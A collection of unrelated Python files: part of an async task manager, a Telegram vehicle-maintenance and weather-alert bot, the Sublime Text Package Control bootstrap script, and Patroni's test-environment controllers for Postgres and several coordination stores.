raise KeyError(f'Worker "{name}" exists.')
worker_spec = AsyncWorkerSpec(
name=coalesce(
name,
self._spec.worker_name_pattern.format(
manager=self._name,
worker=self._next_worker_seq(),
),
),
task_bus=self._task_bus,
request_bus=SimpleQueue(),
response_bus=self._response_bus,
daemon=coalesce(daemon, self._default_worker_spec.daemon),
idle_timeout=rectify(
coalesce(idle_timeout, self._default_worker_spec.idle_timeout),
self._default_worker_spec.idle_timeout,
),
wait_interval=rectify(
coalesce(wait_interval, self._default_worker_spec.wait_interval),
self._default_worker_spec.wait_interval,
),
max_task_count=rectify(
coalesce(max_task_count, self._default_worker_spec.max_task_count),
self._default_worker_spec.max_task_count,
),
max_err_count=rectify(
coalesce(max_err_count, self._default_worker_spec.max_err_count),
self._default_worker_spec.max_err_count,
),
max_cons_err_count=rectify(
coalesce(
max_cons_err_count, self._default_worker_spec.max_cons_err_count
),
self._default_worker_spec.max_cons_err_count,
),
)
return worker_spec
def _get_task_name(self, name: t.Optional[str] = None) -> str:
if name:
if name in self._current_tasks:
raise KeyError(f'Task "{name}" exists.')
return name
return coalesce(
name,
self._spec.task_name_pattern.format(
manager=self._name,
task=self._next_task_seq(),
),
)
def submit(
self,
fn: Function,
args: t.Optional[t.Iterable[t.Any]] = (),
kwargs: t.Optional[t.Dict[str, t.Any]] = None,
name: t.Optional[str] = None,
) -> Future:
if not self._state["running"]:
raise RuntimeError(
f'Manager "{self._name}" is either stopped or not started yet '
"and not able to accept tasks."
)
if not isasync(fn):
raise NotImplementedError(
f'Param "fn" ({fn}) is neither a coroutine nor a coroutine function.'
)
name = self._get_task_name(name)
future = Future()
task = AsyncTask(
name=name,
fn=fn,
args=args or (),
kwargs=kwargs or {},
future=future,
)
self._current_tasks[name] = task
self._task_bus.put(task)
self._adjust_workers()
return future
def _consume_response(self):
response: Action = self._response_bus.get()
response.task_name = t.cast(str, response.task_name)
response.worker_name = t.cast(str, response.worker_name)
if response.match(ACT_DONE, ACT_EXCEPTION):
self._current_tasks.pop(response.task_name)
if response.match(ACT_CLOSE):
self._current_workers.pop(response.worker_name)
elif response.match(ACT_RESTART):
worker = self._current_workers[response.worker_name]
worker.stop()
worker.start()
def _adjust_iterator(self) -> range:
if self._spec.incremental or self._spec.num_workers < 0:
qsize = self._task_bus.qsize()
num_idle_workers: int = sum(
1 if w.is_idle() else 0 for w in self._current_workers.values()
)
if self._spec.num_workers < 0:
iterator = range(qsize - num_idle_workers)
else:
num_curr_workers: int = len(self._current_workers)
iterator = range(
num_curr_workers,
min(
self._spec.num_workers,
num_curr_workers + qsize - num_idle_workers,
),
)
else:
iterator = range(len(self._current_workers), self._spec.num_workers)
return iterator
def _adjust_workers(self):
# return if the number of workers already meets requirements
# works on both incremental and static mode
if len(self._current_workers) == self._spec.num_workers:
return
# if more workers are needed, create them
for _ in self._adjust_iterator():
worker = AsyncWorker(self.get_worker_spec())
self._current_workers[worker._name] = worker
worker.start()
|
bot.py | """
AUTO_BOT bot file
Developers: Andrey Kozlovsky, Stanislav Ermokhin
"""
import datetime
import schedule
import time
import telebot
from telebot import types
from threading import Thread
from config import API_TELEGRAM_TOKEN as TOKEN
import local_en as local
import wrapper_functions
import weather
SECONDS_TO_FETCH = 7
all_seconds = [i for i in range(SECONDS_TO_FETCH)]
TIMES = {(20, 2, all(all_seconds))}
bot = telebot.TeleBot(TOKEN)
user_in_database = wrapper_functions.user_in_database
process_functions_names = ['add_model', 'add_brand', 'add_year',
'add_oil', 'add_insurance', 'add_filter',
'add_tire', 'add_tech']
info_process_functions_names = ['add_username', 'add_city', 'add_email', 'add_password', 'add_phone']
my_commands = dict(zip(local.buttons_add_keyboard, process_functions_names))
user_info_commands = dict(zip(local.buttons_info_keyboard, info_process_functions_names))
def check_errors(msg, func):
x = func(msg)
if x[0]:
bot.send_message(msg.chat.id, local.success)
else:
bot.send_message(msg.chat.id, x[1])
def get_weather_info_on_id(chat_id):
city = wrapper_functions.get_city_by_chat(chat_id)
weather_object = weather.CityInfo(city=city)
dic = weather_object.weather_forecast()
weather_description = dic['weather'][0]['description']
if weather_object.description_bad.intersection(weather_description):
msg_to_send = local.weather_warning + weather_description
bot.send_message(chat_id=chat_id, text=msg_to_send)
else:
pass
def manual_get_weather_info_on_id(chat_id):
city = wrapper_functions.get_city_by_chat(chat_id)
weather_object = weather.CityInfo(city=city)
dic = weather_object.weather_forecast()
weather_description = dic['weather'][0]['description']
msg_to_send = local.weather_warning + weather_description
bot.send_message(chat_id=chat_id, text=msg_to_send)
def send_weather_notification(chat=None):
if not chat:
chat_ids = wrapper_functions.get_all_chat_ids()
for chat_id in chat_ids:
get_weather_info_on_id(chat_id)
else:
manual_get_weather_info_on_id(chat)
@bot.message_handler(commands=['weather'])
def send_on_help(message):
send_weather_notification(message.chat.id)
@bot.message_handler(commands=['start'])
def send_on_start(message):
if user_in_database(message.chat.username):
bot.reply_to(message, local.welcome_back_message1+message.chat.username+local.welcome_back_message2)
else:
action = wrapper_functions.add_username(message.chat)
if action[0]:
bot.reply_to(message, local.start_response_text + local.success)
else:
bot.reply_to(message, local.start_response_text + local.error)
@bot.message_handler(commands=['add'])
def send_on_add(message):
if user_in_database(message.chat.username):
markup = types.InlineKeyboardMarkup(row_width=1)
keyboard_buttons = [types.InlineKeyboardButton(item,
callback_data=item)
for item in local.buttons_add_keyboard]
for obj in keyboard_buttons:
markup.add(obj)
bot.send_message(message.chat.id,
local.explain_add_response,
reply_markup=markup)
else:
bot.reply_to(message, local.error_not_in_database)
@bot.message_handler(commands=['my_info'])
def send_on_info(message):
if user_in_database(message.chat.username):
markup = types.InlineKeyboardMarkup(row_width=1)
keyboard_buttons = [types.InlineKeyboardButton(item,
callback_data=item)
for item in local.buttons_info_keyboard]
for obj in keyboard_buttons:
markup.add(obj)
bot.send_message(message.chat.id,
local.explain_info_response,
reply_markup=markup)
else:
bot.reply_to(message, local.error_not_in_database)
@bot.callback_query_handler(func=lambda call: call.data in my_commands or
call.data in user_info_commands or local.okay in call.data)
def get_on_add(call):
try:
if call.message:
if call.data in my_commands:
msg = bot.reply_to(call.message, text=local.give_value)
result_function = getattr(wrapper_functions, my_commands[call.data])
bot.register_next_step_handler(msg, lambda m: check_errors(m, result_function))
elif call.data in user_info_commands:
msg = bot.reply_to(call.message, local.give_value)
result_function = getattr(wrapper_functions, user_info_commands[call.data])
bot.register_next_step_handler(msg, lambda m: check_errors(m, result_function))
elif local.okay in call.data:
data = call.data
to_find = local.okay + ' '
key = data[len(to_find):]
bot.send_message(call.message.chat.id,
text=local.okay_response+': '+key)
x = wrapper_functions.update_after_notification(call.message, [key])
if x:
bot.send_message(call.message.chat.id,
text=local.success)
else:
bot.send_message(call.message.chat.id, text=local.error)
else:
raise Exception('call.message is None/False') # debugging
except Exception as e:
# sending error message to bot for debugging ----------------
bot.send_message(call.message.chat.id, local.error+'\n'+str(e))
# -----------------------------------------------------------
def schedule_checker():
while True:
schedule.run_pending()
time.sleep(1)
def schedule_checker_weather():
while True:
schedule.run_pending()
time.sleep(10)
def send_notification():
# time check -----
now_time = datetime.datetime.now().timetuple()
current_time = (now_time.tm_hour, now_time.tm_min, now_time.tm_sec)
if current_time in TIMES: # time check -----
chat_ids = wrapper_functions.get_all_chat_ids()
for chat_id in chat_ids:
dic = wrapper_functions.check_notification(chat_id=chat_id)
if dic['type'] != ['' for _ in range(len(dic['type']))]:
markup_okay = types.InlineKeyboardMarkup(row_width=1)
for item in dic['type']:
i = local.types_dict[item]
markup_okay.add(types.InlineKeyboardButton(text=local.okay+' '+i,
callback_data=local.okay+' '+i))
bot.send_message(chat_id=chat_id,
reply_markup=markup_okay,
text=local.notify_okay)
schedule.every(1).seconds.do(send_notification) # (every 1 second) or (every 24 hours and clear time check)
t1 = Thread(target=schedule_checker)
t1.setDaemon(True)
t1.start()
schedule.every(10).minutes.do(send_weather_notification) # weather API limitation
t2 = Thread(target=schedule_checker_weather)
t2.setDaemon(True)
t2.start()
schedule.run_all()
@bot.message_handler(content_types=['text'])
def text_test_run(message):
# debugging and test --------------------------------------------
bot.send_message(message.chat.id, 'Reached function text_test_run')
# ---------------------------------------------------------------
bot.polling()
|
bootstrap.py | import sys
import threading
import os
from textwrap import dedent
import sublime
# Clean up the installed and pristine packages for Package Control 2 to
# prevent a downgrade from happening via Sublime Text
if sys.version_info < (3,):
sublime_dir = os.path.dirname(sublime.packages_path())
pristine_dir = os.path.join(sublime_dir, 'Pristine Packages')
installed_dir = os.path.join(sublime_dir, 'Installed Packages')
pristine_file = os.path.join(pristine_dir, 'Package Control.sublime-package')
installed_file = os.path.join(installed_dir, 'Package Control.sublime-package')
if os.path.exists(pristine_file):
os.remove(pristine_file)
if os.path.exists(installed_file):
os.remove(installed_file)
# Make sure we have recent code in memory
reloader_name = 'package_control.reloader'
if sys.version_info >= (3,):
reloader_name = 'Package Control.' + reloader_name
from imp import reload
if reloader_name in sys.modules:
reload(sys.modules[reloader_name])
if sys.version_info < (3,):
from package_control.bootstrap import bootstrap_dependency
from package_control.package_manager import PackageManager
from package_control import loader
from package_control.settings import pc_settings_filename, load_list_setting, save_list_setting
else:
from .package_control.bootstrap import bootstrap_dependency
from .package_control.package_manager import PackageManager
from .package_control import loader
from .package_control.settings import pc_settings_filename, load_list_setting, save_list_setting
def plugin_loaded():
manager = PackageManager()
settings = manager.settings.copy()
if not os.path.exists(loader.loader_package_path):
base_loader_code = """
import sys
import os
from os.path import dirname
# This file adds the package_control subdirectory of Package Control
# to first in the sys.path so that all other packages may rely on
# PC for utility functions, such as event helpers, adding things to
# sys.path, downloading files from the internet, etc
if sys.version_info >= (3,):
def decode(path):
return path
def encode(path):
return path
loader_dir = dirname(__file__)
else:
def decode(path):
if not isinstance(path, unicode):
path = path.decode(sys.getfilesystemencoding())
return path
def encode(path):
if isinstance(path, unicode):
path = path.encode(sys.getfilesystemencoding())
return path
loader_dir = decode(os.getcwd())
st_dir = dirname(dirname(loader_dir))
found = False
if sys.version_info >= (3,):
installed_packages_dir = os.path.join(st_dir, u'Installed Packages')
pc_package_path = os.path.join(installed_packages_dir, u'Package Control.sublime-package')
if os.path.exists(encode(pc_package_path)):
found = True
if not found:
packages_dir = os.path.join(st_dir, u'Packages')
pc_package_path = os.path.join(packages_dir, u'Package Control')
if os.path.exists(encode(pc_package_path)):
found = True
if found:
if os.name == 'nt':
from ctypes import windll, create_unicode_buffer
buf = create_unicode_buffer(512)
if windll.kernel32.GetShortPathNameW(pc_package_path, buf, len(buf)):
pc_package_path = buf.value
sys.path.insert(0, encode(pc_package_path))
import package_control
# We remove the import path right away so as not to screw up
# Sublime Text and its import machinery
sys.path.remove(encode(pc_package_path))
else:
print(u'Package Control: Error finding main directory from loader')
"""
base_loader_code = dedent(base_loader_code)
loader.add('00', 'package_control', base_loader_code)
pc_settings = sublime.load_settings(pc_settings_filename())
# Make sure we are track Package Control itself
installed_packages = load_list_setting(pc_settings, 'installed_packages')
if 'Package Control' not in installed_packages:
installed_packages.append('Package Control')
save_list_setting(pc_settings, pc_settings_filename(), 'installed_packages', installed_packages)
# We no longer use the installed_dependencies setting because it is not
# necessary and created issues with settings shared across operating systems
if pc_settings.get('installed_dependencies'):
pc_settings.erase('installed_dependencies')
sublime.save_settings(pc_settings_filename())
# SSL support fo Linux
if sublime.platform() == 'linux':
linux_ssl_url = u'http://packagecontrol.io/ssl/1.0.1/ssl-linux.sublime-package'
linux_ssl_hash = u'862d061cbe666777cd1e9cd1cbc7c82f48ad8897dbb68332975f3edf5ce0f38d'
linux_ssl_priority = u'01'
linux_ssl_version = '1.0.1'
def linux_ssl_show_restart():
sublime.message_dialog(u'Package Control\n\n'
u'Package Control just installed or upgraded the missing ' + \
u'Python _ssl module for Linux since Sublime Text does not ' + \
u'include it.\n\n' + \
u'Please restart Sublime Text to make SSL available to all ' + \
u'packages.')
linux_ssl_args = (settings, linux_ssl_url,
linux_ssl_hash, linux_ssl_priority, linux_ssl_version, linux_ssl_show_restart)
threading.Thread(target=bootstrap_dependency, args=linux_ssl_args).start()
# SSL support for SHA-2 certificates with ST2 on Windows
if sublime.platform() == 'windows' and sys.version_info < (3,):
win_ssl_url = u'http://packagecontrol.io/ssl/1.0.0/ssl-windows.sublime-package'
win_ssl_hash = u'3c28982eb400039cfffe53d38510556adead39ba7321f2d15a6770d3ebc75030'
win_ssl_priority = u'01'
win_ssl_version = u'1.0.0'
def win_ssl_show_restart():
sublime.message_dialog(u'Package Control\n\n'
u'Package Control just upgraded the Python _ssl module for ' + \
u'ST2 on Windows because the bundled one does not include ' + \
u'support for modern SSL certificates.\n\n' + \
u'Please restart Sublime Text to complete the upgrade.')
win_ssl_args = (settings, win_ssl_url, win_ssl_hash,
win_ssl_priority, win_ssl_version, win_ssl_show_restart)
threading.Thread(target=bootstrap_dependency, args=win_ssl_args).start()
# ST2 compat
if sys.version_info < (3,):
plugin_loaded()
|
environment.py | import abc
import consul
import datetime
import etcd
import kazoo.client
import kazoo.exceptions
import os
import psutil
import psycopg2
import json
import shutil
import signal
import six
import subprocess
import sys
import tempfile
import threading
import time
import yaml
@six.add_metaclass(abc.ABCMeta)
class AbstractController(object):
def __init__(self, context, name, work_directory, output_dir):
self._context = context
self._name = name
self._work_directory = work_directory
self._output_dir = output_dir
self._handle = None
self._log = None
def _has_started(self):
return self._handle and self._handle.pid and self._handle.poll() is None
def _is_running(self):
return self._has_started()
@abc.abstractmethod
def _is_accessible(self):
"""process is accessible for queries"""
@abc.abstractmethod
def _start(self):
"""start process"""
def start(self, max_wait_limit=5):
if self._is_running():
return True
self._log = open(os.path.join(self._output_dir, self._name + '.log'), 'a')
self._handle = self._start()
assert self._has_started(), "Process {0} is not running after being started".format(self._name)
max_wait_limit *= self._context.timeout_multiplier
for _ in range(max_wait_limit):
if self._is_accessible():
break
time.sleep(1)
else:
assert False,\
"{0} instance is not available for queries after {1} seconds".format(self._name, max_wait_limit)
def stop(self, kill=False, timeout=15, _=False):
term = False
start_time = time.time()
timeout *= self._context.timeout_multiplier
while self._handle and self._is_running():
if kill:
self._handle.kill()
elif not term:
self._handle.terminate()
term = True
time.sleep(1)
if not kill and time.time() - start_time > timeout:
kill = True
if self._log:
self._log.close()
def cancel_background(self):
pass
class PatroniController(AbstractController):
__PORT = 5360
PATRONI_CONFIG = '{}.yml'
""" starts and stops individual patronis"""
def __init__(self, context, name, work_directory, output_dir, custom_config=None):
super(PatroniController, self).__init__(context, 'patroni_' + name, work_directory, output_dir)
PatroniController.__PORT += 1
self._data_dir = os.path.join(work_directory, 'data', name)
self._connstring = None
if custom_config and 'watchdog' in custom_config:
self.watchdog = WatchdogMonitor(name, work_directory, output_dir)
custom_config['watchdog'] = {'driver': 'testing', 'device': self.watchdog.fifo_path, 'mode': 'required'}
else:
self.watchdog = None
self._scope = (custom_config or {}).get('scope', 'batman')
self._config = self._make_patroni_test_config(name, custom_config)
self._closables = []
self._conn = None
self._curs = None
def write_label(self, content):
with open(os.path.join(self._data_dir, 'label'), 'w') as f:
f.write(content)
def read_label(self):
try:
with open(os.path.join(self._data_dir, 'label'), 'r') as f:
return f.read().strip()
except IOError:
return None
@staticmethod
def recursive_update(dst, src):
for k, v in src.items():
if k in dst and isinstance(dst[k], dict):
PatroniController.recursive_update(dst[k], v)
else:
dst[k] = v
def update_config(self, custom_config):
with open(self._config) as r:
config = yaml.safe_load(r)
self.recursive_update(config, custom_config)
with open(self._config, 'w') as w:
yaml.safe_dump(config, w, default_flow_style=False)
self._scope = config.get('scope', 'batman')
def add_tag_to_config(self, tag, value):
self.update_config({'tags': {tag: value}})
def _start(self):
if self.watchdog:
self.watchdog.start()
if isinstance(self._context.dcs_ctl, KubernetesController):
self._context.dcs_ctl.create_pod(self._name[8:], self._scope)
os.environ['PATRONI_KUBERNETES_POD_IP'] = '10.0.0.' + self._name[-1]
return subprocess.Popen([sys.executable, '-m', 'coverage', 'run',
'--source=patroni', '-p', 'patroni.py', self._config],
stdout=self._log, stderr=subprocess.STDOUT, cwd=self._work_directory)
def stop(self, kill=False, timeout=15, postgres=False):
if postgres:
return subprocess.call(['pg_ctl', '-D', self._data_dir, 'stop', '-mi', '-w'])
super(PatroniController, self).stop(kill, timeout)
if isinstance(self._context.dcs_ctl, KubernetesController):
self._context.dcs_ctl.delete_pod(self._name[8:])
if self.watchdog:
self.watchdog.stop()
def _is_accessible(self):
cursor = self.query("SELECT 1", fail_ok=True)
if cursor is not None:
cursor.execute("SET synchronous_commit TO 'local'")
return True
def _make_patroni_test_config(self, name, custom_config):
patroni_config_name = self.PATRONI_CONFIG.format(name)
patroni_config_path = os.path.join(self._output_dir, patroni_config_name)
with open(patroni_config_name) as f:
config = yaml.safe_load(f)
config.pop('etcd', None)
host = config['postgresql']['listen'].split(':')[0]
config['postgresql']['listen'] = config['postgresql']['connect_address'] = '{0}:{1}'.format(host, self.__PORT)
config['name'] = name
config['postgresql']['data_dir'] = self._data_dir
config['postgresql']['use_unix_socket'] = True
config['postgresql']['parameters'].update({
'logging_collector': 'on', 'log_destination': 'csvlog', 'log_directory': self._output_dir,
'log_filename': name + '.log', 'log_statement': 'all', 'log_min_messages': 'debug1',
'unix_socket_directories': self._data_dir})
if 'bootstrap' in config:
config['bootstrap']['post_bootstrap'] = 'psql -w -c "SELECT 1"'
if 'initdb' in config['bootstrap']:
config['bootstrap']['initdb'].extend([{'auth': 'md5'}, {'auth-host': 'md5'}])
if custom_config is not None:
self.recursive_update(config, custom_config)
if config['postgresql'].get('callbacks', {}).get('on_role_change'):
config['postgresql']['callbacks']['on_role_change'] += ' ' + str(self.__PORT)
with open(patroni_config_path, 'w') as f:
yaml.safe_dump(config, f, default_flow_style=False)
user = config['postgresql'].get('authentication', config['postgresql']).get('superuser', {})
self._connkwargs = {k: user[n] for n, k in [('username', 'user'), ('password', 'password')] if n in user}
self._connkwargs.update({'host': host, 'port': self.__PORT, 'database': 'postgres'})
self._replication = config['postgresql'].get('authentication', config['postgresql']).get('replication', {})
self._replication.update({'host': host, 'port': self.__PORT, 'database': 'postgres'})
return patroni_config_path
def _connection(self):
if not self._conn or self._conn.closed != 0:
self._conn = psycopg2.connect(**self._connkwargs)
self._conn.autocommit = True
return self._conn
def _cursor(self):
if not self._curs or self._curs.closed or self._curs.connection.closed != 0:
self._curs = self._connection().cursor()
return self._curs
def query(self, query, fail_ok=False):
try:
cursor = self._cursor()
cursor.execute(query)
return cursor
except psycopg2.Error:
if not fail_ok:
raise
def check_role_has_changed_to(self, new_role, timeout=10):
bound_time = time.time() + timeout
recovery_status = new_role != 'primary'
while time.time() < bound_time:
cur = self.query("SELECT pg_is_in_recovery()", fail_ok=True)
if cur:
row = cur.fetchone()
if row and row[0] == recovery_status:
return True
time.sleep(1)
return False
def get_watchdog(self):
return self.watchdog
def _get_pid(self):
try:
pidfile = os.path.join(self._data_dir, 'postmaster.pid')
if not os.path.exists(pidfile):
return None
return int(open(pidfile).readline().strip())
except Exception:
return None
def database_is_running(self):
pid = self._get_pid()
if not pid:
return False
try:
os.kill(pid, 0)
except OSError:
return False
return True
def patroni_hang(self, timeout):
hang = ProcessHang(self._handle.pid, timeout)
self._closables.append(hang)
hang.start()
def checkpoint_hang(self, timeout):
pid = self._get_pid()
if not pid:
return False
proc = psutil.Process(pid)
for child in proc.children():
if 'checkpoint' in child.cmdline()[0]:
checkpointer = child
break
else:
return False
hang = ProcessHang(checkpointer.pid, timeout)
self._closables.append(hang)
hang.start()
return True
def cancel_background(self):
for obj in self._closables:
obj.close()
self._closables = []
def terminate_backends(self):
pid = self._get_pid()
if not pid:
return False
proc = psutil.Process(pid)
for p in proc.children():
if 'process' not in p.cmdline()[0]:
p.terminate()
@property
def backup_source(self):
return 'postgres://{username}:{password}@{host}:{port}/{database}'.format(**self._replication)
def backup(self, dest='basebackup'):
subprocess.call([PatroniPoolController.BACKUP_SCRIPT, '--walmethod=none',
'--datadir=' + os.path.join(self._output_dir, dest),
'--dbname=' + self.backup_source])
class ProcessHang(object):
"""A background thread implementing a cancelable process hang via SIGSTOP."""
def __init__(self, pid, timeout):
self._cancelled = threading.Event()
self._thread = threading.Thread(target=self.run)
self.pid = pid
self.timeout = timeout
def start(self):
self._thread.start()
def run(self):
os.kill(self.pid, signal.SIGSTOP)
try:
self._cancelled.wait(self.timeout)
finally:
os.kill(self.pid, signal.SIGCONT)
def close(self):
self._cancelled.set()
self._thread.join()
class AbstractDcsController(AbstractController):
_CLUSTER_NODE = '/service/{0}'
def __init__(self, context, mktemp=True):
work_directory = mktemp and tempfile.mkdtemp() or None
super(AbstractDcsController, self).__init__(context, self.name(), work_directory, context.pctl.output_dir)
def _is_accessible(self):
return self._is_running()
def stop(self, kill=False, timeout=15):
""" terminate process and wipe out the temp work directory, but only if we actually started it"""
super(AbstractDcsController, self).stop(kill=kill, timeout=timeout)
if self._work_directory:
shutil.rmtree(self._work_directory)
def path(self, key=None, scope='batman'):
return self._CLUSTER_NODE.format(scope) + (key and '/' + key or '')
@abc.abstractmethod
def query(self, key, scope='batman'):
""" query for a value of a given key """
@abc.abstractmethod
def cleanup_service_tree(self):
""" clean all contents stored in the tree used for the tests """
@classmethod
def get_subclasses(cls):
for subclass in cls.__subclasses__():
for subsubclass in subclass.get_subclasses():
yield subsubclass
yield subclass
@classmethod
def name(cls):
return cls.__name__[:-10].lower()
class ConsulController(AbstractDcsController):
def __init__(self, context):
super(ConsulController, self).__init__(context)
os.environ['PATRONI_CONSUL_HOST'] = 'localhost:8500'
os.environ['PATRONI_CONSUL_REGISTER_SERVICE'] = 'on'
self._client = consul.Consul()
self._config_file = None
def _start(self):
self._config_file = self._work_directory + '.json'
with open(self._config_file, 'wb') as f:
f.write(b'{"session_ttl_min":"5s","server":true,"bootstrap":true,"advertise_addr":"127.0.0.1"}')
return subprocess.Popen(['consul', 'agent', '-config-file', self._config_file, '-data-dir',
self._work_directory], stdout=self._log, stderr=subprocess.STDOUT)
def stop(self, kill=False, timeout=15):
super(ConsulController, self).stop(kill=kill, timeout=timeout)
if self._config_file:
os.unlink(self._config_file)
def _is_running(self):
try:
return bool(self._client.status.leader())
except Exception:
return False
def path(self, key=None, scope='batman'):
return super(ConsulController, self).path(key, scope)[1:]
def query(self, key, scope='batman'):
_, value = self._client.kv.get(self.path(key, scope))
return value and value['Value'].decode('utf-8')
def cleanup_service_tree(self):
self._client.kv.delete(self.path(scope=''), recurse=True)
def start(self, max_wait_limit=15):
super(ConsulController, self).start(max_wait_limit)
class EtcdController(AbstractDcsController):
""" handles all etcd related tasks, used for the tests setup and cleanup """
def __init__(self, context):
super(EtcdController, self).__init__(context)
os.environ['PATRONI_ETCD_HOST'] = 'localhost:2379'
self._client = etcd.Client(port=2379)
def _start(self):
return subprocess.Popen(["etcd", "--debug", "--data-dir", self._work_directory],
stdout=self._log, stderr=subprocess.STDOUT)
def query(self, key, scope='batman'):
try:
return self._client.get(self.path(key, scope)).value
except etcd.EtcdKeyNotFound:
return None
def cleanup_service_tree(self):
try:
self._client.delete(self.path(scope=''), recursive=True)
except (etcd.EtcdKeyNotFound, etcd.EtcdConnectionFailed):
return
except Exception as e:
assert False, "exception when cleaning up etcd contents: {0}".format(e)
def _is_running(self):
# if etcd is running, but we didn't start it
try:
return bool(self._client.machines)
except Exception:
return False
class KubernetesController(AbstractDcsController):
def __init__(self, context):
super(KubernetesController, self).__init__(context)
self._namespace = 'default'
self._labels = {"application": "patroni"}
self._label_selector = ','.join('{0}={1}'.format(k, v) for k, v in self._labels.items())
os.environ['PATRONI_KUBERNETES_LABELS'] = json.dumps(self._labels)
os.environ['PATRONI_KUBERNETES_USE_ENDPOINTS'] = 'true'
from kubernetes import client as k8s_client, config as k8s_config
k8s_config.load_kube_config(context='local')
self._client = k8s_client
self._api = self._client.CoreV1Api()
def _start(self):
pass
def create_pod(self, name, scope):
labels = self._labels.copy()
labels['cluster-name'] = scope
metadata = self._client.V1ObjectMeta(namespace=self._namespace, name=name, labels=labels)
spec = self._client.V1PodSpec(containers=[self._client.V1Container(name=name, image='empty')])
body = self._client.V1Pod(metadata=metadata, spec=spec)
self._api.create_namespaced_pod(self._namespace, body)
def delete_pod(self, name):
try:
self._api.delete_namespaced_pod(name, self._namespace, self._client.V1DeleteOptions())
except:
pass
while True:
try:
self._api.read_namespaced_pod(name, self._namespace)
except:
break
def query(self, key, scope='batman'):
if key.startswith('members/'):
pod = self._api.read_namespaced_pod(key[8:], self._namespace)
return (pod.metadata.annotations or {}).get('status', '')
else:
try:
e = self._api.read_namespaced_endpoints(scope + ('' if key == 'leader' else '-' + key), self._namespace)
if key == 'leader':
return e.metadata.annotations[key]
else:
return json.dumps(e.metadata.annotations)
except:
return None
def cleanup_service_tree(self):
try:
self._api.delete_collection_namespaced_pod(self._namespace, label_selector=self._label_selector)
except:
pass
try:
self._api.delete_collection_namespaced_endpoints(self._namespace, label_selector=self._label_selector)
except:
pass
while True:
result = self._api.list_namespaced_pod(self._namespace, label_selector=self._label_selector)
if len(result.items) < 1:
break
def _is_running(self):
return True
class ZooKeeperController(AbstractDcsController):
""" handles all zookeeper related tasks, used for the tests setup and cleanup """
def __init__(self, context, export_env=True):
super(ZooKeeperController, self).__init__(context, False)
if export_env:
os.environ['PATRONI_ZOOKEEPER_HOSTS'] = "'localhost:2181'"
self._client = kazoo.client.KazooClient()
def _start(self):
pass # TODO: implement later
def query(self, key, scope='batman'):
try:
return self._client.get(self.path(key, scope))[0].decode('utf-8')
except kazoo.exceptions.NoNodeError:
return None
def cleanup_service_tree(self):
try:
self._client.delete(self.path(scope=''), recursive=True)
except (kazoo.exceptions.NoNodeError):
return
except Exception as e:
assert False, "exception when cleaning up zookeeper contents: {0}".format(e)
def _is_running(self):
# if zookeeper is running, but we didn't start it
if self._client.connected:
return True
try:
return self._client.start(1) or True
except Exception:
return False
class ExhibitorController(ZooKeeperController):
def __init__(self, context):
super(ExhibitorController, self).__init__(context, False)
os.environ.update({'PATRONI_EXHIBITOR_HOSTS': 'localhost', 'PATRONI_EXHIBITOR_PORT': '8181'})
class PatroniPoolController(object):
BACKUP_SCRIPT = 'features/backup_create.sh'
def __init__(self, context):
self._context = context
self._dcs = None
self._output_dir = None
self._patroni_path = None
self._processes = {}
self.create_and_set_output_directory('')
self.known_dcs = {subclass.name(): subclass for subclass in AbstractDcsController.get_subclasses()}
@property
def patroni_path(self):
if self._patroni_path is None:
cwd = os.path.realpath(__file__)
while True:
cwd, entry = os.path.split(cwd)
if entry == 'features' or cwd == '/':
break
self._patroni_path = cwd
return self._patroni_path
@property
def output_dir(self):
return self._output_dir
def start(self, name, max_wait_limit=20, custom_config=None):
if name not in self._processes:
self._processes[name] = PatroniController(self._context, name, self.patroni_path,
self._output_dir, custom_config)
self._processes[name].start(max_wait_limit)
def __getattr__(self, func):
if func not in ['stop', 'query', 'write_label', 'read_label', 'check_role_has_changed_to', 'add_tag_to_config',
'get_watchdog', 'database_is_running', 'checkpoint_hang', 'patroni_hang',
'terminate_backends', 'backup']:
raise AttributeError("PatroniPoolController instance has no attribute '{0}'".format(func))
def wrapper(name, *args, **kwargs):
return getattr(self._processes[name], func)(*args, **kwargs)
return wrapper
def stop_all(self):
for ctl in self._processes.values():
ctl.cancel_background()
ctl.stop()
self._processes.clear()
def create_and_set_output_directory(self, feature_name):
feature_dir = os.path.join(self.patroni_path, 'features/output', feature_name.replace(' ', '_'))
if os.path.exists(feature_dir):
shutil.rmtree(feature_dir)
os.makedirs(feature_dir)
self._output_dir = feature_dir
def clone(self, from_name, cluster_name, to_name):
f = self._processes[from_name]
custom_config = {
'scope': cluster_name,
'bootstrap': {
'method': 'pg_basebackup',
'pg_basebackup': {
'command': self.BACKUP_SCRIPT + ' --walmethod=stream --dbname=' + f.backup_source
},
'dcs': {
'postgresql': {
'parameters': {
'max_connections': 101
}
}
}
},
'postgresql': {
'parameters': {
'archive_mode': 'on',
'archive_command': 'mkdir -p {0} && test ! -f {0}/%f && cp %p {0}/%f'.format(
os.path.join(self._output_dir, 'wal_archive'))
},
'authentication': {
'superuser': {'password': 'zalando1'},
'replication': {'password': 'rep-pass1'}
}
}
}
self.start(to_name, custom_config=custom_config)
def bootstrap_from_backup(self, name, cluster_name):
custom_config = {
'scope': cluster_name,
'bootstrap': {
'method': 'backup_restore',
'backup_restore': {
'command': 'features/backup_restore.sh --sourcedir=' + os.path.join(self._output_dir, 'basebackup'),
'recovery_conf': {
'recovery_target_action': 'promote',
'recovery_target_timeline': 'latest',
'restore_command': 'cp {0}/wal_archive/%f %p'.format(self._output_dir)
}
}
},
'postgresql': {
'authentication': {
'superuser': {'password': 'zalando2'},
'replication': {'password': 'rep-pass2'}
}
}
}
self.start(name, custom_config=custom_config)
@property
def dcs(self):
if self._dcs is None:
self._dcs = os.environ.pop('DCS', 'etcd')
assert self._dcs in self.known_dcs, 'Unsupported dcs: ' + self._dcs
return self._dcs
class WatchdogMonitor(object):
"""Testing harness for emulating a watchdog device as a named pipe. Because we can't easily emulate ioctl's we
require a custom driver on Patroni side. The device takes no action, only notes if it was pinged and/or triggered.
"""
def __init__(self, name, work_directory, output_dir):
self.fifo_path = os.path.join(work_directory, 'data', 'watchdog.{0}.fifo'.format(name))
self.fifo_file = None
self._stop_requested = False # Relying on bool setting being atomic
self._thread = None
self.last_ping = None
self.was_pinged = False
self.was_closed = False
self._was_triggered = False
self.timeout = 60
self._log_file = open(os.path.join(output_dir, 'watchdog.{0}.log'.format(name)), 'w')
self._log("watchdog {0} initialized".format(name))
def _log(self, msg):
tstamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S,%f")
self._log_file.write("{0}: {1}\n".format(tstamp, msg))
def start(self):
assert self._thread is None
self._stop_requested = False
